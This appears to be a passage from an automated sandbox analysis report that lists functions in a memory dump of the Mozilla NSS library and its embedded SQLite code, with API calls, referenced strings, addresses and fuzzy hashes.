SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAD0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CAD1006
PK11_FreeSymKey.NSS3(?), ref: 6CAD101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAD1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAD103F
PK11_FreeSymKey.NSS3(00000000), ref: 6CAD1048
memcpy.VCRUNTIME140(?,?,?), ref: 6CAD108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAD10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6CAD10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6CAD112E

Part of subcall function 6CAD1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CAD08C4,?,?), ref: 6CAD15B8
Part of subcall function 6CAD1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CAD08C4,?,?), ref: 6CAD15C1
Part of subcall function 6CAD1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD162E
Part of subcall function 6CAD1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD1637

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: e09e836a6d50c01beb42c6c8ebfa5328bc35d77c23de069aabc0cfba38083d8d
Instruction ID: 4fc35843c797b85ea8664f2ef2ded9ebc3bee49b2727b24b60fa1053b5f88af8
Opcode Fuzzy Hash: e09e836a6d50c01beb42c6c8ebfa5328bc35d77c23de069aabc0cfba38083d8d
Instruction Fuzzy Hash: 6271C1B1A042458FDB00CFA5CD84A7AB7F4FF48328F19862DE61997711E771E988CB91

Function 6CAF1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6CAF1F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6CAF2166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6CAF228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6CAF23B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAF241C

Strings

model, xrefs: 6CAF23CB, 6CAF23EC
token, xrefs: 6CAF1F2C
manufacturer, xrefs: 6CAF2179
serial, xrefs: 6CAF22A2

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: 924ea5c56d47cd22a9c731337aa2f3d544ead7e16af247b166cada52090eedfc
Instruction ID: b347e7d3f0883ed35a8bc4d5d2d3c2a7d83d2a11cdbdd0621cf013ffa5da3a81
Opcode Fuzzy Hash: 924ea5c56d47cd22a9c731337aa2f3d544ead7e16af247b166cada52090eedfc
Instruction Fuzzy Hash: BB02DBA2D0C7C86EF7318A71C44C3D76EE09B45328F4C176AE6AE56683C3B859CA8355

Function 6CAF6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CAA1C6F,00000000,00000004,?,?), ref: 6CAF6C3F

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CAA1C6F,00000000,00000004,?,?), ref: 6CAF6C60
PR_ExplodeTime.NSS3(00000000,6CAA1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CAA1C6F,00000000,00000004,?,?), ref: 6CAF6C94

Strings

gfff, xrefs: 6CAF6D9C
gfff, xrefs: 6CAF6D30
gfff, xrefs: 6CAF6CF5
gfff, xrefs: 6CAF6D66
gfff, xrefs: 6CAF6CFD

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 2fe2519a07ee3331b81f4b547714e87b18cecab2ec88a0bb310a376543d0d86b
Instruction ID: 51061bf6e86bd984f2f8aa21288c69527548655dfbe106a3f0221f8aed14b35f
Opcode Fuzzy Hash: 2fe2519a07ee3331b81f4b547714e87b18cecab2ec88a0bb310a376543d0d86b
Instruction Fuzzy Hash: 8A513972B016494FC708CDADDC626DEBBEAABA4310F48C23AE442DB781D678D946C751

Function 6CB70F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6CB71027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB710B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB71353

Strings

%lld, xrefs: 6CB7114B
zeroblob(%d), xrefs: 6CB71223
$, xrefs: 6CB712A0
-- , xrefs: 6CB70FF5
%02x, xrefs: 6CB712F6
NULL, xrefs: 6CB7119E
'%.*q', xrefs: 6CB71217, 6CB71292

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 558c83fcba7a03fcdfd0eb217b0910e84bcd68c24820d3f35ea5a90c0f8ee7b5
Instruction ID: a5bcdac952b0ff1b99e5b5b0431c72122d463c61ff6a231c2673e019767212e0
Opcode Fuzzy Hash: 558c83fcba7a03fcdfd0eb217b0910e84bcd68c24820d3f35ea5a90c0f8ee7b5
Instruction Fuzzy Hash: 88E1A0719083809FD724CF14C490A6BBBF5EF85358F09891DE9A98BB51D731E849CB63

Function 6CB78FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB78FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB790DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB79118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB7915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB791C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB79209

Strings

UUUU, xrefs: 6CB79255
3333, xrefs: 6CB7925E

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 7057ea5c2829098b4fb65eae29efd4d57d64a143c483a4be14f38d3b60a92315
Instruction ID: b0d5975c11710cbd2b60a041608120fafdab9d6b8206a2527f1dc4fdb4b851a8
Opcode Fuzzy Hash: 7057ea5c2829098b4fb65eae29efd4d57d64a143c483a4be14f38d3b60a92315
Instruction Fuzzy Hash: FEA1CE72E001559BDB14CB68CC95BAEB7B5FF48328F0A4129ED15B7381E736AC01CBA1

Function 6CA30FE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6CA2CA30: EnterCriticalSection.KERNEL32(?,?,?,6CA8F9C9,?,6CA8F4DA,6CA8F9C9,?,?,6CA5369A), ref: 6CA2CA7A
Part of subcall function 6CA2CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA2CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6CA3103E
EnterCriticalSection.KERNEL32(?), ref: 6CA31139
LeaveCriticalSection.KERNEL32(?), ref: 6CA31190
sqlite3_free.NSS3(00000000), ref: 6CA31227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6CA3126E
sqlite3_free.NSS3(?), ref: 6CA3127F

Strings

winAccess, xrefs: 6CA3129B
delayed %dms for lock/sharing conflict at line %d, xrefs: 6CA31267

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-1873940834
Opcode ID: bc414991186988620b3008e1c9a1f740b351ce00d57faca0f1010cfafb956744
Instruction ID: a7d9f61fff317851d505695be60bc2138f55e41f6aae43023a0ce676f5868241
Opcode Fuzzy Hash: bc414991186988620b3008e1c9a1f740b351ce00d57faca0f1010cfafb956744
Instruction Fuzzy Hash: 827119317042619BEB04DF64ECA5ABF3375EB46318F19122DFA29D7A80DB31D885C792

Function 6CA3AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6CB5CF46,?,6CA2CDBD,?,6CB5BF31,?,?,?,?,?,?,?), ref: 6CA3B039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CB5CF46,?,6CA2CDBD,?,6CB5BF31), ref: 6CA3B090
sqlite3_free.NSS3(?,?,?,?,?,?,6CB5CF46,?,6CA2CDBD,?,6CB5BF31), ref: 6CA3B0A2
CloseHandle.KERNEL32(?,?,6CB5CF46,?,6CA2CDBD,?,6CB5BF31,?,?,?,?,?,?,?,?,?), ref: 6CA3B100
sqlite3_free.NSS3(?,?,00000002,?,6CB5CF46,?,6CA2CDBD,?,6CB5BF31,?,?,?,?,?,?,?), ref: 6CA3B115
sqlite3_free.NSS3(?,?,?,?,?,?,6CB5CF46,?,6CA2CDBD,?,6CB5BF31), ref: 6CA3B12D

Part of subcall function 6CA29EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA3C6FD,?,?,?,?,6CA8F965,00000000), ref: 6CA29F0E
Part of subcall function 6CA29EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CA8F965,00000000), ref: 6CA29F5D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 3a46388f25a090d1c362360ef3f95d0e9c3576f51f7ea013bef1cc65339e5295
Instruction ID: d137d780e06785e1d33d949a15799e145fe71f971f188294dc2e40fadc5e2cab
Opcode Fuzzy Hash: 3a46388f25a090d1c362360ef3f95d0e9c3576f51f7ea013bef1cc65339e5295
Instruction Fuzzy Hash: 3F91FFB0A046258FDB04CF78D890B6BB7B2BF45308F18562DE41AD7B50EB35E884CB51

Function 6CB0BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CB0BD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CB0BD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CB0BD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CB0BD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CB0BDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CB0BDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CB0BDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CB0BE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CB0BE1E

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: def3c65996dd1bf2f36248e1d7a4e2b4f88342a4154a36f83e7bea899c807da9
Instruction ID: 86bd46205c8445296d1ef2e7379b3567078408674d46f7227c0751d68aa961a1
Opcode Fuzzy Hash: def3c65996dd1bf2f36248e1d7a4e2b4f88342a4154a36f83e7bea899c807da9
Instruction Fuzzy Hash: 1A21F577F006D95BFB004A5BAC47F8F7A78EB91B4DF080524F916EE641E7509418C2A3

Function 6CBB8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CC014E4,6CB6CC70), ref: 6CBB8D47
PR_GetCurrentThread.NSS3 ref: 6CBB8D98

Part of subcall function 6CA90F00: PR_GetPageSize.NSS3(6CA90936,FFFFE8AE,?,6CA216B7,00000000,?,6CA90936,00000000,?,6CA2204A), ref: 6CA90F1B
Part of subcall function 6CA90F00: PR_NewLogModule.NSS3(clock,6CA90936,FFFFE8AE,?,6CA216B7,00000000,?,6CA90936,00000000,?,6CA2204A), ref: 6CA90F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CBB8E7B
htons.WSOCK32(?), ref: 6CBB8EDB
PR_GetCurrentThread.NSS3 ref: 6CBB8F99
PR_GetCurrentThread.NSS3 ref: 6CBB910A

Strings

%u.%u.%u.%u, xrefs: 6CBB8E74

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 8ba4671b71e370e2a0d81e9b91286f713fdd6d0d55cdb7278b0dc4708f64c52f
Instruction ID: 7af6342d7b94ed8b1ca58de96a18947d229e21e755d232e9553247f9623b3de1
Opcode Fuzzy Hash: 8ba4671b71e370e2a0d81e9b91286f713fdd6d0d55cdb7278b0dc4708f64c52f
Instruction Fuzzy Hash: 6002AA31D062D28FDB14CF19C46837ABBB2EF52304F1A825ED8956FA91CB32D949C791

Function 6CA3EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

temporary table name must be unqualified, xrefs: 6CA3F734
not authorized, xrefs: 6CA3F957, 6CA3F9BA
there is already an index named %s, xrefs: 6CA3F9D7
sqlite_master, xrefs: 6CA3F0AB, 6CA3F2DA, 6CA3F757, 6CA3F93E
table, xrefs: 6CA3F05C, 6CA3FABC, 6CA3FAC7
%s %T already exists, xrefs: 6CA3FAC8
view, xrefs: 6CA3F061, 6CA3F071, 6CA3FAB7
sqlite_temp_master, xrefs: 6CA3F0A6, 6CA3F2D5
authorizer malfunction, xrefs: 6CA3F95C, 6CA3F9BF, 6CA3FA5E, 6CA3FA8B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 7d0543708bdaca4dff75ac38cc6133f42f609d369f838f27fff98ea1af5ba8c2
Instruction ID: 2d2e66bb604ecf9ecd0dfca950552542f0e569fabd909893592991ed24db327c
Opcode Fuzzy Hash: 7d0543708bdaca4dff75ac38cc6133f42f609d369f838f27fff98ea1af5ba8c2
Instruction Fuzzy Hash: 9472E370E142258FDB14CF68C894BAABBF1BF49308F1881ADD818DB752D775E885CB90

Function 6CB59C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6CA2C52B), ref: 6CB59D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB5A035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB5A114

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB5A01F, 6CB5A0E4, 6CB5A0FE
%s at line %d of [%.10s], xrefs: 6CB5A02E, 6CB5A10D
database corruption, xrefs: 6CB5A029, 6CB5A108

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: b6907a72fa8c63621c4459edafbb1a4e848c1eac0db575d4da9342b350a78172
Instruction ID: 363f41017b69969996d46cfe8f1509604495f536b1bcf91c81d818a86c651eac
Opcode Fuzzy Hash: b6907a72fa8c63621c4459edafbb1a4e848c1eac0db575d4da9342b350a78172
Instruction Fuzzy Hash: 5722B071A083818FC704CF29C49062AB7E1FFCA344F948A2DE9DAA7651D735E856CB52

Function 6CB79D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CA38637,?,?), ref: 6CB79E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CA38637), ref: 6CB79ED6

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB79EC0
%s at line %d of [%.10s], xrefs: 6CB79ECF
database corruption, xrefs: 6CB79ECA

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 3383a4e05779afdc14cbc426a4d81b06e8c47c7c11f6448c2af7c45f12fad879
Instruction ID: 4aa375e33c79194448a5529a6163f580c682982272655f706d1133b8919e00ae
Opcode Fuzzy Hash: 3383a4e05779afdc14cbc426a4d81b06e8c47c7c11f6448c2af7c45f12fad879
Instruction Fuzzy Hash: D3818F31F012558FDB14CF6AC981ADEB3B6EF48304B158529EC29ABB41E731ED49CB61

Function 6CB87F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,?), ref: 6CB881BC

Strings

BINARY, xrefs: 6CB88126
out of memory, xrefs: 6CB8835B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: memset
String ID: BINARY$out of memory
API String ID: 2221118986-3971123528
Opcode ID: 0be5d665f0f7d4e27b83bf0ac44166dc103d1e34cf373731831c2b56d738f2a3
Instruction ID: e387a5ce6dd907470a3a803ffadbb6c5aa34c6a401b8fbdf48efb055df9f7881
Opcode Fuzzy Hash: 0be5d665f0f7d4e27b83bf0ac44166dc103d1e34cf373731831c2b56d738f2a3
Instruction Fuzzy Hash: 1F52B271E06298DFDB14CF99C890BAEBBB2FF48318F14815AD815AB751D731AC46CB81

Function 6CB09EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CB09ED6

